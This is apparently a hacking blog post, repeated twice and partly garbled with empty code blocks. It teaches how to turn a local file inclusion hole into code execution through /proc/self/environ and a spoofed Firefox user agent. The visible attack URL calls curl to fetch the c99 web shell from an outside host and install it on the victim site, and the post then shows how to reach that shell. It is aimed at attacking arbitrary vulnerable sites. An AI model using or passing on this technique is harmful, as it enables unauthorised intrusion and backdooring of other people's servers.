Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about:config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:
Code:
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with
Code:
If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...
Instead of typing
Code:
as useragent,type this:
Code:
Then load your vuln page like this:
Code:
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:
Code:
And that's all for now...cheers!
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about:config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:
Code:
Preference name Status Type Value general.useragent.extra.firefox default string Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with
Code:
If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...
Instead of typing
Code:
as useragent,type this:
Code:
Then load your vuln page like this:
Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:
Code:
http://yourvulnsite.com/c99.php
And that's all for now...cheers!
0 comments:
Post a Comment